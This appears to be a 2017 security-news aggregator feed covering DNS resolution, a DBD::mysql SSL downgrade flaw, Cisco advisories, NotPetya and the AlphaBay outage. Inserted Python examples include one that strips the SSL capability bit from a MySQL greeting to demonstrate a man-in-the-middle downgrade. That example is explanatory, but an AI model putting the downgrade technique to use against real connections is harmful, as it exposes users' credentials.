At first, we considered having our customers and team members join one of the intelligence community’s many existing information-sharing groups. But the more research we did, the more apparent it became that no existing group aligned well enough with BRI’s strategic, risk-centric focus and the broad spectrum of use cases our customers sought to address. So instead of joining a group that wasn’t the best fit for our (and our customers’) needs, we joined forces with our customers and our subject matter experts and created one of our own. Fittingly, it’s called Flashpoint | Collaboration — better known as FPCollab.

Over the last year, FPCollab has grown to support a trusted network of professionals by providing timely insights and intelligence to facilitate more effective decisions around risk. Consisting exclusively of Flashpoint customers and team members, this uniquely diverse and collaborative community comprises the following:

• Experts from leading organizations in 18 industries across the public and private sectors
• Native or fluent speakers of Arabic, Mandarin, Farsi, Turkish, Kazakh, Spanish, French, German, Russian, Ukrainian, Italian, and Portuguese
• Threat intelligence pioneers who have built and led top global intelligence teams
• Cyber and physical security experts with skills honed during careers in the U.S. military and public-sector intelligence agencies
• Leaders representing business units including cybersecurity, physical security, executive protection, fraud, M&A, supply chain, insider threat, anti-money laundering, counterterrorism, vendor risk management, human resources, engineering, compliance, and public policy
• Subject matter experts with comprehensive visibility into the most exclusive regions of the Deep & Dark Web

We strive for FPCollab to help organizations across all industries and business units leverage our joint wisdom and intelligence to alleviate the broad spectrum of challenges and uncertainties contributing to their overall risk. And given the continual growth and enthusiastic participation of FPCollab’s esteemed pool of members — not to mention the countless complex challenges these members have helped one another address — I couldn’t be prouder of the community we’ve all created.

For more information regarding Flashpoint | Collaboration, Business Risk Intelligence (BRI), or to speak with one of our subject matter experts, please contact us.

 

 

The post FPCollab: Intelligence Sharing for Risk, Security and Business Leaders appeared first on Flashpoint.

Google Patches Critical ‘Broadpwn’ Bug in July Security Update

July 06, 2017 04:30 PM - Threatpost - The July Android Security Bulletin patches 11 critical remote-code execution bugs including one dubbed ‘Broadpwn’ that impacts both Android and iOS devices.

Black Hat Survey: Security Pros Expect Major Breaches in Next Two Years

July 06, 2017 04:00 PM - Dark Reading - Significant compromises are not just feared, but expected, Black Hat attendees say

The iPhone at 10: Still No Major Malware

July 06, 2017 03:59 PM - The Mac Security Blog - Many people are writing about the success of the iPhone, and how ten years on, we can clearly see how it changed personal computing. As the fastest-selling consumer electronic device ever, this pocket computer has swept across the globe like a tsunami, selling hundreds of millions of units. In the past year alone, Apple has […]

So, you want a master's degree in cybersecurity?

July 06, 2017 03:32 PM - CSO Online -

In last week's Cybersecurity Business Report, we suggested you might want to send your kid to cybersecurity school (college).

This week, we take a cursory glance at some cybersecurity master’s degree programs in the U.S. The list—culled from the MastersInCyber.com directory—is intended as a starting point and is not an endorsement of any particular school. Each of the schools presented has its own unique courses, and some get into security niches not covered by others.

To read this article in full or to leave a comment, please click here

Security Experts & Hackers: We're Not So Different

July 06, 2017 03:00 PM - Dark Reading - Using the similarities among hackers and security programmers can be an advantage.

IDG Contributor Network: Understanding the basics of threat abstraction and modeling

July 06, 2017 02:40 PM - CSO Online -

Threat Abstraction and Modeling is an important piece of planning in the enterprise as it can be used as an approach to better secure software. Spending some time during your planning stages thinking about threats and potential threats to your latest project can pay for itself in spades when the rubber meets the road and you’re ready to build out or deploy your latest software project or infrastructure installation.

While on its surface threat modeling seems like an advanced skill above your pay grade, in reality we humans are already predisposed to threat modeling in our everyday lives. For example, you may already ask yourself:

To read this article in full or to leave a comment, please click here

The Growing Danger of IP Theft and Cyber Extortion

July 06, 2017 02:30 PM - Dark Reading - The recent hacks of Disney and Netflix show the jeopardy that intellectual property and company secrets are in, fueled by cheap hacking tools and cryptocurrencies.

How Does DNS Work?

July 06, 2017 02:23 PM - Dyn -

It is surprising how many developers have only a limited, or even no, understanding of how DNS resolution actually works. So it may be useful to give a quick, high-level overview of the process that is followed when a DNS resolution request is made.

At the simplest level, all the DNS system does is convert a DNS name into an IP address; as you’d expect, however, there is a large degree of complexity behind the system.

Every domain that is registered gets a DNS zone, usually hosted by the company that registers the domain; once registered, however, the zone can be moved to be hosted elsewhere. The zone is simply a set of text records that defines what information should be given to anyone asking about names under this domain. This includes the addresses used for web resolution (A and AAAA records) as well as other information such as where mail servers should connect to (MX records).

In reality there are variations and optimizations of the system to improve reliability and efficiency, but the essentials of the process are as follows.

When you type an address into a web browser:

  • A check is made to see if the answer for that name is already known locally, e.g., the browser or operating system has cached a previous answer for the same name, or there is an entry in the local hosts file (C:\Windows\System32\drivers\etc\hosts on Windows, /etc/hosts on Unix-like systems).
  • If no local record is found, a request is sent to your configured recursive DNS server. This could be running locally on your machine or on an office network, but most commonly it is provided by the ISP that supplies your internet connection.
  • The recursive DNS server again checks whether it already has the answer cached. If there is no cached record, the DNS server needs to locate the name server that hosts the zone for the address you are trying to resolve (the authoritative name server).
  • To do this the DNS server breaks the name down into its labels, starting from the right-hand side of the domain name. For example, www.google.com would be split into com, google, and www. The label after the final . of the domain name (in this case, com) is known as the top-level domain (TLD). A root name server is queried to find the servers responsible for the TLD.
  • The DNS server then queries the TLD name servers for the name servers responsible for the next label (in this example, google). It then asks the name server for google.com, which may return a referral to yet another name server that holds the records for www.google.com or, more likely at this point, the address record for www.google.com itself.
  • The answer returned by the authoritative name server can be an IP address (an A or AAAA record) or an alias to another domain name (a CNAME record); for example, www.google.com might return a reference to cdn-us.aa1.google-us.com.
  • If a CNAME is returned, the DNS server repeats the whole process for the CNAME target until an IP address is resolved.

An example of a recursive DNS process is shown below.
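The walk above, as an added example in Python that is not part of the Dyn article: a toy iterative resolver over constructed in-memory zones (the root, the com TLD, and two authoritative servers). The names and addresses (ns1.google.com., the 192.0.2.x TEST-NET addresses, the cdn-us.aa1.google-us.com alias) are placeholders, not real records. It covers the local hosts-file check, the root-to-TLD-to-authoritative referral chain, CNAME chasing, caching, and the failure mode a real resolver must guard against: a CNAME loop.

```python
# Added example, not from the Dyn article: an iterative resolver over constructed zones.
from collections import namedtuple

RR = namedtuple("RR", "name type value")   # one resource record (names are fully qualified)

# Step 1 of the walk: the local hosts file (constructed contents).
HOSTS = {"localhost.": "127.0.0.1"}

# Constructed zone data. Each "server" either answers for names it is authoritative
# for or hands back a referral (NS record) to a more specific server. The google and
# google-us names and the 192.0.2.x addresses are placeholders, not real records.
SERVERS = {
    "root": [
        RR("com.", "NS", "a.gtld-servers.net."),
    ],
    "a.gtld-servers.net.": [                       # the .com TLD servers
        RR("google.com.", "NS", "ns1.google.com."),
        RR("google-us.com.", "NS", "ns1.google-us.com."),
    ],
    "ns1.google.com.": [                           # authoritative for google.com
        RR("www.google.com.", "CNAME", "cdn-us.aa1.google-us.com."),
        RR("mail.google.com.", "A", "192.0.2.10"),
        RR("loop-a.google.com.", "CNAME", "loop-b.google.com."),   # deliberate loop
        RR("loop-b.google.com.", "CNAME", "loop-a.google.com."),
    ],
    "ns1.google-us.com.": [                        # authoritative for google-us.com
        RR("cdn-us.aa1.google-us.com.", "A", "192.0.2.20"),
    ],
}


def ask(server, qname, qtype):
    """Query one server. Returns ('answer', rr), ('referral', next_server) or ('nxdomain', None)."""
    records = SERVERS[server]
    for rr in records:
        if rr.name == qname and rr.type in (qtype, "CNAME"):
            return "answer", rr
    # Referral: the NS record whose zone is the longest suffix of the query name.
    best = None
    for rr in records:
        if rr.type == "NS" and qname.endswith("." + rr.name):
            if best is None or len(rr.name) > len(best.name):
                best = rr
    if best is not None:
        return "referral", best.value
    return "nxdomain", None


def resolve(qname, qtype="A", cache=None, max_cnames=8):
    """Resolve qname iteratively from the root, chasing CNAMEs. Returns (value_or_None, trace)."""
    cache = {} if cache is None else cache
    trace = []
    if qtype == "A" and qname in HOSTS:
        trace.append("hosts file: %s" % qname)
        return HOSTS[qname], trace
    for _ in range(max_cnames):
        key = (qname, qtype)
        if key in cache:
            trace.append("cache hit: %s %s" % (qname, qtype))
            return cache[key], trace
        server = "root"
        while True:
            kind, payload = ask(server, qname, qtype)
            trace.append("%s -> %s %s: %s" % (server, qname, qtype, kind))
            if kind == "referral":
                server = payload            # follow the referral down the tree
            elif kind == "nxdomain":
                return None, trace
            elif payload.type == "CNAME":
                qname = payload.value       # alias: start over with the target name
                break
            else:
                cache[key] = payload.value
                return payload.value, trace
    raise RuntimeError("CNAME chain longer than %d hops (loop?) ending at %s" % (max_cnames, qname))


if __name__ == "__main__":
    address, steps = resolve("www.google.com.")
    print("\n".join(steps))
    print("www.google.com. ->", address)
```

The trace for www.google.com. shows the six round trips a cold cache costs: root, TLD, and authoritative server for the original name, then the same three again for the CNAME target. A shared cache dictionary turns the second lookup of the same name into a single hit, which is why recursive resolvers sit close to the client.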

NSLookup

Most domain name resolution information is publicly available. Using the nslookup tool available on the command line of most computers, you can directly query the DNS system and retrieve the records published for any domain. nslookup lets you query using your default DNS server or a different one that you specify (e.g., Google’s public DNS server 8.8.8.8), to check that your local DNS is returning the same answers as other people are seeing.

There are also a number of websites that will perform an nslookup query for you.

Facebook fights gag prohibiting it from alerting users to search warrants

July 06, 2017 02:07 PM - Naked Security - It's thought that the case might stem from the arrests made during the protests at Trump's inauguration when the profiles of some of the more than 200 people arrested were mined for information

All you need to know about the move from SHA-1 to SHA-2

July 06, 2017 01:44 PM - CSO Online -

For the past two years, I’ve been busy helping Public Key Infrastructure (PKI) customers prepare for and move to SHA-2, the set of cryptographic hash functions that have succeeded SHA-1. Last year, moving to SHA-2 ahead of the global deadline was a nice-to-do preparatory step. This year, now that the migration deadline has passed, it’s required.

Many devices and applications that consume digital certificates already display warnings or errors, or fail outright, when presented with a certificate signed using SHA-1 (or an earlier hash), and soon all of them will. Why the forced change? Because SHA-1 has been shown to suffer such severe cryptographic weaknesses that its days of useful protection are over.

To read this article in full or to leave a comment, please click here

Watch Out for Malware If You're Interested in North Korean Missile Program

July 06, 2017 01:28 PM - The Hacker News - If you hold an interest in the North Korean Missile Program and are one of those curious to know the capabilities of the recently tested North Korean long-range missile, then you could be a target of a new malware campaign. North Korea claims to have conducted the first test of an intercontinental ballistic missile (ICBM), the Hwasong-14, on 3rd July, and US officials believe the country may have

Perl devs fix an important flaw in DBD::mysql that affects encryption between client and server

July 06, 2017 01:22 PM - Security Affairs -

The DBD::mysql maintainers have fixed a flaw in the driver that, in some configurations, did not enforce encryption, allowing an attacker to mount man-in-the-middle (MiTM) attacks.

Security researcher Pali Rohár reported the flaw, tracked as CVE-2017-10789; it affects only the encryption between client and server. According to the researcher, DBD::mysql would silently fall back to a cleartext connection in those configurations.

“The DBD::mysql module through 4.043 for Perl uses the mysql_ssl=1 setting to mean that SSL is optional (even though this setting’s documentation has a “your communication with the server will be encrypted” statement), which allows man-in-the-middle attackers to spoof servers via a cleartext-downgrade attack, a related issue to CVE-2015-3152.” reads the description provided by the Mitre.

Rohár discovered that the Perl DBD::mysql driver does not enforce SSL/TLS encryption when the option mysql_ssl=1 is enabled.

“Enabling encryption depends on an announcement from the MySQL server of what it supports, which a man-in-the-middle attacker can spoof. DBD::mysql does not enforce SSL/TLS encryption even when a certificate is specified via the connection parameter mysql_ssl_ca_file.” states the advisory published by the researcher. “Therefore usage of SSL/TLS encryption in DBD::mysql is insecure.”

The Perl 5 database interface maintainers have issued a security patch for DBD::mysql; a note on the project’s GitHub account confirms that the issue left systems vulnerable to the BACKRONYM and Riddle attacks.

“The important change is that DBD::mysql rejects the connection to the MySQL server (also an SSL-enabled one) if mysql_ssl=1 is set and the libmysqlclient.so library cannot enforce SSL encryption (because it is vulnerable to BACKRONYM or Riddle).” reads the note on GitHub.

Riddle was disclosed earlier in 2017 in the popular Oracle MySQL DBMS; the issue can be exploited by an attacker in a man-in-the-middle position to steal usernames and passwords.

“The Riddle is a critical security vulnerability found in Oracle’s MySQL 5.5 and 5.6 client database libraries. The vulnerability allows an attacker to use riddle in the middle for breaking SSL configured connection between MySQL client and server.” states the description of the flaw. “This vulnerability is a very critical security hole because it affects MySQL — a very popular SQL database — and SSL connection which is by its definition secure.”

The flaw, tracked as CVE-2017-3305, exposes login credentials to eavesdropping: an attacker can capture them when MySQL 5.5 and 5.6 clients send them to the server. A security update released in versions 5.5.49 and 5.6.30 failed to completely fix the bug. Versions 5.7 and later, as well as MariaDB, are not affected by this issue.

According to Rohár, the Riddle vulnerability results from the failed attempt to patch the BACKRONYM vulnerability in MySQL. BACKRONYM exposes passwords to attackers who are in a position to run a man-in-the-middle attack, even when the connection is supposed to be encrypted.

The DBD::mysql developers fixed the issue by making the driver reject the connection when mysql_ssl=1 is set and the underlying client library cannot enforce SSL encryption.
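To make the downgrade concrete, here is an added Python model (not DBD::mysql’s or libmysqlclient’s code) of the part of the MySQL handshake the attack manipulates. The greeting bytes are constructed to the real Handshake v10 layout and CLIENT_SSL is the real capability bit (0x0800); the two client policies stand in for the old mysql_ssl=1 behaviour (TLS only if the server happens to advertise it) and the patched behaviour (refuse to continue when TLS cannot be enforced). The function names, the `DowngradeRefused` exception and the sample capability value are the example’s own.

```python
# Added example, not DBD::mysql's code: a model of the MySQL greeting downgrade.
import struct

CLIENT_SSL = 0x0800   # real capability bit: server can switch the connection to TLS


class DowngradeRefused(Exception):
    """Raised by the hardened client policy when TLS was required but not advertised."""


def build_greeting(server_version, capabilities):
    """Constructed Handshake v10 greeting (payload only, up to the upper capability bytes).

    Real greetings continue with the auth-plugin data length, reserved bytes and the
    plugin name; those fields play no part in the downgrade and are omitted here.
    """
    return (
        b"\x0a"                                      # protocol version 10
        + server_version + b"\x00"                   # server version, NUL-terminated
        + struct.pack("<I", 42)                      # connection id
        + b"\x00" * 8                                # auth-plugin-data part 1 (zeroed here)
        + b"\x00"                                    # filler
        + struct.pack("<H", capabilities & 0xFFFF)   # capability flags, lower 2 bytes
        + b"\x21"                                    # character set (utf8_general_ci)
        + struct.pack("<H", 0x0002)                  # status flags (SERVER_STATUS_AUTOCOMMIT)
        + struct.pack("<H", capabilities >> 16)      # capability flags, upper 2 bytes
    )


def _capability_offset(greeting):
    """Offset of the lower capability bytes: after version string, conn id, auth data, filler."""
    if greeting[0] != 0x0A:
        raise ValueError("not a Handshake v10 greeting")
    version_end = greeting.index(b"\x00", 1)
    return version_end + 1 + 4 + 8 + 1


def parse_capabilities(greeting):
    off = _capability_offset(greeting)
    lower = struct.unpack_from("<H", greeting, off)[0]
    upper = struct.unpack_from("<H", greeting, off + 2 + 1 + 2)[0]   # skip charset, status
    return lower | (upper << 16)


def mitm_strip_ssl(greeting):
    """What an active attacker does: rewrite the greeting so the server appears not to do TLS."""
    off = _capability_offset(greeting)
    lower = struct.unpack_from("<H", greeting, off)[0]
    lower &= 0xFFFF ^ CLIENT_SSL
    return greeting[:off] + struct.pack("<H", lower) + greeting[off + 2:]


def client_negotiate(greeting, require_tls):
    """Return 'tls' if the client will send SSLRequest, 'cleartext' if it proceeds in the clear.

    require_tls=False is the pre-fix mysql_ssl=1 behaviour (TLS only when advertised);
    require_tls=True is the patched behaviour: refuse instead of downgrading.
    """
    caps = parse_capabilities(greeting)
    if caps & CLIENT_SSL:
        return "tls"
    if require_tls:
        raise DowngradeRefused("server did not advertise CLIENT_SSL; refusing cleartext connection")
    return "cleartext"


if __name__ == "__main__":
    honest = build_greeting(b"5.7.18-log", 0x8000F7FF | CLIENT_SSL)
    tampered = mitm_strip_ssl(honest)
    print("honest greeting, optional TLS :", client_negotiate(honest, False))
    print("tampered greeting, optional TLS:", client_negotiate(tampered, False))
    try:
        client_negotiate(tampered, True)
    except DowngradeRefused as exc:
        print("tampered greeting, required TLS:", exc)
```

The lesson carries over to any client library with an “SSL if available” switch: a single cleared bit in an unauthenticated server greeting is enough to obtain the password in the clear, so the only safe default is to fail closed when the server does not advertise TLS.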

Pierluigi Paganini 

(Security Affairs – DBD::mysql, MiTM)


The post Perl devs fix an important flaw in DBD::mysql that affects encryption between client and server appeared first on Security Affairs.

ProtonMail v3.9 Release Notes

July 06, 2017 01:14 PM - ProtonMail -

ProtonMail 3.9 adds ProtonVPN integration for protecting your traffic while browsing, faster and more powerful Search, new languages, and new Drag & Drop features to make organizing your inbox easier.

Note: Due to the way we roll out new versions, ProtonMail 3.9 has not been released to everyone yet. If you do not see it yet, you will see it soon.

Over the past 3 months, we have been focused on large scale projects, such as ProtonVPN and also the upcoming IMAP/SMTP support for ProtonMail. Version 3.9 however brings several incremental changes and sets the stage for the additional releases we have planned for this summer. We expect in the next couple months to increase the speed of new ProtonMail releases.

ProtonMail does not show advertisements or abuse your privacy to make money. Paid accounts are our only source of funding. Please consider upgrading to a ProtonMail Plus account so that we can continue to operate the service and fund further development.

Drag & Drop Messages

This feature lets you organize your inbox quickly and easily using your custom folders/labels. Just hold down a message and drag it into the appropriate folder/label.

Improved Search

We have made further performance improvements to search, and it is now approximately 1000x faster than it was a few months ago. We have also made ProtonMail’s advanced search feature more powerful. Advanced search now also accepts complex queries such as this:

(cat -dog) | (cat mouse)

You can learn about ProtonMail’s improved search here.

Note that search still does not work for ProtonMail message bodies, as we do not have the ability to read your messages. However, we are working on a project now that will enable full-text search of your ProtonMail messages and we hope to have the first public release near the end of this summer.

Improved Language Support

The ProtonMail Translation Project has now been underway for several months, and thanks to the incredible volunteer translators from the community, ProtonMail’s web interface is now available in the following languages: French, German, Russian, Spanish, Polish and Turkish

To change the language of your ProtonMail webmail interface, go to Settings –> Account –> Language.

Auto Unsubscribe

The auto-unsubscribe feature makes it easier to unsubscribe from email lists or newsletters that you no longer want to receive. It works by identifying the unsubscribe link in the hidden List-Unsubscribe header and making it available in the top right corner of your message. To remove your email address from a mailing list, just click “Unsubscribe”.

ProtonVPN

After more than 1 year of development, and four months of beta testing by over 10’000 members of the ProtonMail community, we’re finally making ProtonVPN available to everyone. And we really mean everyone, because consistent with our mission to make privacy and security accessible to every single person in the world, we’re also releasing ProtonVPN as a free VPN service.

ProtonVPN is now integrated into the ProtonMail dashboard, which means you can upgrade to the paid version of ProtonVPN from Settings –> Dashboard.

Note: If you are a ProtonMail Plus user, you can get a 20% discount bundle when signing up for ProtonVPN. This discount is shown at checkout. Also, ProtonMail Visionary users get ProtonVPN Plus for free.

You can also manage your ProtonVPN settings now from ProtonMail Settings, by clicking on the VPN tab:

You can learn more about ProtonVPN by going here: https://protonvpn.com

Version 3.9 Full Release Notes

New Features

  • Update Dashboard and VPN tab for the ProtonVPN release
  • Drag & Drop Elements
  • Added translations for French, German, Russian, Spanish, and Turkish
  • New sent/drafts behaviour. By default, Sent and Drafts folders will no longer show trashed or moved messages. However, the old behavior can be restored by adjusting the setting in Settings –> Account.
  • Improved Search released
  • Added auto-unsubscribe from mailing lists feature

Bug Fixes

  • Fixed problem with links not working on Safari
  • Fixed problem with displaying plaintext messages

Improvements

  • Added folder context to showing read/unread conversations in folders
  • Improved the browser message caching
  • Improved custom filters UI
  • Increased search speeds by 1000x
  • Improved the settings screens for setting display names and signatures for extra addresses to be less confusing

 

As always, your feedback is appreciated. Please report bugs using ProtonMail report bug feature, or send us a support request here: https://protonmail.com/support

The post ProtonMail v3.9 Release Notes appeared first on ProtonMail Blog.

Leading Into Prime Day, Amazon Offers 4 Months of Music Unlimited for $0.99 - Deal Alert

July 06, 2017 01:14 PM - CSO Online -

Amazon's Music Unlimited service is typically offered at $9.99/month, but Amazon has activated a special promotion as a teaser to their upcoming Prime Day on July 11. The promotion just dropped today and gets you 4 months of their Music Unlimited service for just $0.99, if you're a Prime member (or have a 30 day Prime free trial: get one here). Music Unlimited offers tens of millions of songs, with new releases from today's most popular artists. Listen ad-free with unlimited skips on all of your devices, and download for offline listening. Learn more about the very competitive streaming music service from Amazon, and take advantage of the $0.99 subscription offer, at Amazon's Music Unlimited page located here.

To read this article in full or to leave a comment, please click here

Gunshot detector automatically turns on stingray surveillance devices

July 06, 2017 01:00 PM - CSO Online -

Sadly, it seems like all you have to do is check out the news to hear about someone being shot.

To help with gun crime, more and more places are deploying gunshot detection technology such as ShotSpotter. It uses acoustic sensors (basically microphones) attached to street lights, utility poles and even rooftops—installed about 30 or more feet in the air—to detect gunshots. Other gunshot detector sensors help to triangulate where shots were fired and alert the police to the location of the gunshot. While this all happens very quickly, reportedly as fast as 45 seconds, it also relies on a human to first verify the sound was indeed gunfire.

To read this article in full or to leave a comment, please click here

FIRST announces release of Guidelines and Practices for Multi-Party Vulnerability Coordination and Disclosure

July 06, 2017 01:00 PM - FIRST -

The Forum of Incident Response and Security Teams announces the release of a set of guidelines and norms for vulnerability disclosure that affects multiple parties.

Symantec to Buy 'Browser Isolation' Firm Fireglass

July 06, 2017 12:35 PM - Dark Reading - Fireglass's emerging Web security technology will become modular component in Symantec's Integrated Cyber Defense Platform.

Everything you need to know about the latest variant of Petya

July 06, 2017 12:00 PM - WeLiveSecurity -

The latest global cyberattack, detected by ESET as Win32/Diskcoder.C and considered a variant of Petya, once again highlights the reality that outdated systems and insufficient security solutions are still widespread.

The post Everything you need to know about the latest variant of Petya appeared first on WeLiveSecurity

How to Retrieve Deleted Photos from your Phone

July 06, 2017 11:30 AM - Cyberogism -

So, you just accidentally deleted all those super important vacation pictures you wanted to post on social media. They’re displaced from your smartphone memory...

The post How to Retrieve Deleted Photos from your Phone appeared first on Cyberogism.

Now It's Easier than Ever to Steal Someone's Keys

July 06, 2017 11:27 AM - Schneier on Security -

The website key.me will make a duplicate key from a digital photo.

If a friend or coworker leaves their keys unattended for a few seconds, you know what to do.

Hackers Linked to NotPetya Ransomware Decrypted a File For Us

July 06, 2017 11:27 AM - Office of Inadequate Security - Joseph Cox and Lorenzo Franceschi-Bicchierai report: Hackers linked to the crippling NotPetya ransomware attack, which encrypts files on infected machines, have proved to Motherboard they have the ability to decrypt some locked files. Security researchers have spent much of the last week debating whether victims of NotPetya will ever get their files back, with many [...]

ZW: Computers with Criminal Records Stolen from Gutu Magistrate’s Court

July 06, 2017 11:24 AM - Office of Inadequate Security - Terrence Mawawa reports: Daring robbers broke into the office of Gutu Magistrate, Edwin Marecha, and stole two computers. […] According to sources at the Gutu Magistrates’ Court, the robbers targeted the two computers only, indicating a likelihood that they probably were after destroying criminal records and related evidence. Read more on ZimEye.

Why doctors using SnapChat to send scans is not the problem

July 06, 2017 11:12 AM - Naked Security - It's not so much the app the doctors are using, it's that they're using it to sidestep the official channels

Last month’s malware outbreak cost this household company £100 million

July 06, 2017 11:12 AM - TripWire - The State of Security -

Reckitt Benckiser, the household goods manufacturer of such famous products as Nurofen painkillers, Durex condoms, Dettol, and Harpic, has warned that it was hit hard by the June 27th global malware outbreak which struck power plants, airports, and government agencies in Ukraine before spreading to other multinational firms. In a sales warning for investors Reckitt […]

Snap Map Feature Stirs Privacy Concerns among Parents and Schools

July 06, 2017 11:08 AM - TripWire - The State of Security -

Snapchat’s new Snap Map location-sharing feature is stirring concerns among parents and schools for the privacy and safety of their children. Launched on 21 June 2017, Snap Map allows Snapchat users to view publicly shared “Snaps” (photos and videos) from around the world. They can also use it to share their exact location with their […]

AlphaBay Market, one of the largest Dark Web marketplaces is down. Is it an Exit-Scam?

July 06, 2017 10:38 AM - Security Affairs -

The AlphaBay Market went down Tuesday night without any explanation; many users who have purchased products on the marketplace fear an exit scam.

The news is shocking: the AlphaBay Market, one of the largest Dark Web black markets, is down. We have analyzed this popular black market many times; on it, it was possible to buy any kind of illegal goods, including drugs, malicious code and fake documents.

The AlphaBay Market went down Tuesday night without any explanation; many users who purchased products in the last day are waiting for news. At the time of writing there is no indication that the marketplace went down due to an operation conducted by law enforcement.

AlphaBay is considered the largest marketplace on the dark web, competing against the likes of Abraxas, Dream, and Hansa. The marketplace’s operators have continued improving the site by adding new features, including Monero support.

News is circulating online that the black market’s administrators have pulled a classic exit scam to steal users’ Bitcoin.

Users on Reddit and Twitter claim that the administrators shut down the black market in order to withdraw a huge amount of Bitcoin from AlphaBay market accounts.

Analysis of the withdrawals shows that the admins transferred 1,479.03904709 Bitcoin (roughly $3.8 million), which led some users to suspect that the site’s admins may have pulled an exit scam to steal user funds.

AlphaBay Market

Of course, at the time of writing this is only a hypothesis: the AlphaBay Market has gone down before, and last year the black market was not accessible for about four days. Moreover, blockchain transactions of about $3.8 million are not enough for AlphaBay moderators to go offline.

Some users do not seem worried; one of them published the following message on Reddit, arguing that roughly $4 million is not enough for AlphaBay operators to disappear:

“Now I’ll admit I don’t know for sure what’s going on, and I am a bit nervous myself because if this is the end then I’ve lost a couple hundred dollars myself. But think about it: last year alphabay went down for about 4 days,” states the message. “Everyone was saying for sure that this was it, but it wasn’t. It took the alphabay moderators days to update people on what was going on too, they’re known to do this. Also about that blockchain transaction.. 44 bitcoins rounds off to about 4 million US. Idk about you but that doesn’t sound like nearly enough money.”

A Reddit user associated with the AlphaBay Market, who goes by the moniker Big_Muscles, has called on users to calm down, explaining that the site is down for server maintenance and will be “back online soon.”

“Will be back online soon. Servers under update” said Big_Muscles.

I reached Rick Holland, VP Strategy at Digital Shadows, for a comment.

“Dark web exit scams are nothing new and are quite common. The Evolution market famously ended with the loss of 40,000 bitcoins. These exit scams are one of the risks when conducting business in criminal marketplaces. The increasing value of BTC (>$2,500 as of today) makes exit scams appealing. These exit scams are often the first assumption when a marketplace goes offline; however, there are alternatives including intrusions from other criminals, DDoS attacks from competitors, law enforcement interdictions, and even unannounced site maintenance,” states Holland.

“Multiple vendors of compromised data, payment card details, malware and other services would have to seek other online services. The Dream and Hansa markets are likely to benefit from any potential Alphabay demise. Digital Shadows is tracking this development and will provide updated analysis as it becomes available.”

The AlphaBay marketplace made headlines early last year when unknown attackers hacked the website and stole over 200,000 private unencrypted messages from several users.

In March 2015, the largest dark web market at the time, ‘Evolution,’ suddenly disappeared overnight in similar circumstances; its operators stole millions of dollars’ worth of Bitcoin from its customers.

Pierluigi Paganini

(Security Affairs – AlphaBay, Dark Web)


Guide to the top college and university cyber security degree programs

July 06, 2017 10:00 AM - CSO Online -

The shortage of cyber security professionals is well documented, and this lack of expertise can keep organizations from bolstering their security programs. CISOs and CSOs should be heartened by the fact that more colleges and universities are offering academic programs and degrees in cyber security specialties. They are also doing their best to place young professionals into the workforce.

Dozens of institutions have launched undergraduate and graduate security programs. Many provide both technical and management skills to help students become well versed in the latest security technologies, threats, vulnerabilities and management strategies.

Here’s a look at a few of the leading programs in the United States.


BrandPost: Are massive cyberattacks the new normal?

July 06, 2017 09:14 AM - CSO Online -

CISCO fixed 3 critical issues in Elastic Services Controller and Ultra Services Framework

July 06, 2017 08:22 AM - Security Affairs -

CISCO fixed three critical issues in Elastic Services Controller and Ultra Services Framework; admins have to patch them manually.

The latest weekly security update list published by CISCO includes three critical vulnerabilities affecting the Elastic Services Controller and Ultra Services Framework.

The flaw, tracked as CVE-2017-6713, in the Elastic Services Controller network function virtualisation management environment is related to the use of static default credentials that would let a remote attacker access all instances of the controller’s UI.

“A vulnerability in the Play Framework of Cisco Elastic Services Controller (ESC) could allow an unauthenticated, remote attacker to gain full access to the affected system.” reads the security advisory published by CISCO.

“The vulnerability is due to static, default credentials for the Cisco ESC UI that are shared between installations. An attacker who can extract the static credentials from an existing installation of Cisco ESC could generate an admin session token that allows access to all instances of the ESC web UI.”

As reported in the security advisory, the same credentials are shared between multiple installations, allowing an attacker to generate an admin session token and access any instance of the Elastic Services Controller web UI.

A second issue, tracked as CVE-2017-6712, is a privilege escalation bug: the ‘tomcat’ user can run certain shell commands that let it overwrite any file on the system and elevate its privileges to root.

“A vulnerability in certain commands of Cisco Elastic Services Controller could allow an authenticated, remote attacker to elevate privileges to root and run dangerous commands on the server.” states the advisory issued by CISCO.

“The vulnerability occurs because a “tomcat” user on the system can run certain shell commands, allowing the user to overwrite any file on the filesystem and elevate privileges to root. An exploit could allow an authenticated, remote attacker to elevate privileges and run dangerous commands on the server.”

CISCO Elastic Services Controller

Other issues affect the Ultra Services Framework’s (USF) automation service.

The first bug in the Ultra Services Framework’s (USF) automation service (CVE-2017-6711) is related to an insecure configuration of the Apache ZooKeeper service, which could be exploited by a remote attacker to get access to the orchestrator network.

“A vulnerability in the Ultra Automation Service (UAS) of the Cisco Ultra Services Framework could allow an unauthenticated, remote attacker to gain unauthorized access to a targeted device.” states the advisory.

“The vulnerability is due to an insecure default configuration of the Apache ZooKeeper service used by the affected software. An attacker could exploit this vulnerability by accessing the affected device through the orchestrator network. An exploit could allow the attacker to gain access to ZooKeeper data nodes (znodes) and influence the behavior of the system’s high-availability feature.”

The second bug in the Ultra Services Framework’s (USF) automation service, tracked as CVE-2017-6714, resides in the Staging Server and could lead to arbitrary command execution.

“A vulnerability in the AutoIT service of Cisco Ultra Services Framework Staging Server could allow an unauthenticated, remote attacker to execute arbitrary shell commands as the Linux root user.” states the advisory.

“The vulnerability is due to improper shell invocations. An attacker could exploit this vulnerability by crafting CLI command inputs to execute Linux shell commands as the root user. An exploit could allow the attacker to execute arbitrary shell commands as the Linux root user.”

The last issue is a Log File User Credential Information Disclosure Vulnerability (CVE-2017-6709) in the USF’s AutoVNF tool.

Admin credentials are logged in clear text; an attacker can retrieve them by accessing the log file’s URL.

A vulnerability in the AutoVNF tool for the Cisco Ultra Services Framework could allow an unauthenticated, remote attacker to access administrative credentials for Cisco Elastic Services Controller (ESC) and Cisco OpenStack deployments in an affected system.

“The vulnerability exists because the affected software logs administrative credentials in clear text for Cisco ESC and Cisco OpenStack deployment purposes. An attacker could exploit this vulnerability by accessing the AutoVNF URL for the location where the log files are stored and subsequently accessing the administrative credentials that are stored in clear text in those log files. A successful exploit could allow the attacker to access the administrative credentials for Cisco ESC and Cisco OpenStack deployments in the affected system, which the attacker could use to conduct additional attacks.” states the advisory.

“The same product also has a symbolic link error that exposes the system to arbitrary file read and malicious code execution.”

Pierluigi Paganini 

(Security Affairs – CISCO, hacking)


AlphaBay Dark Web Market Goes Down; Users Fear Exit-Scam

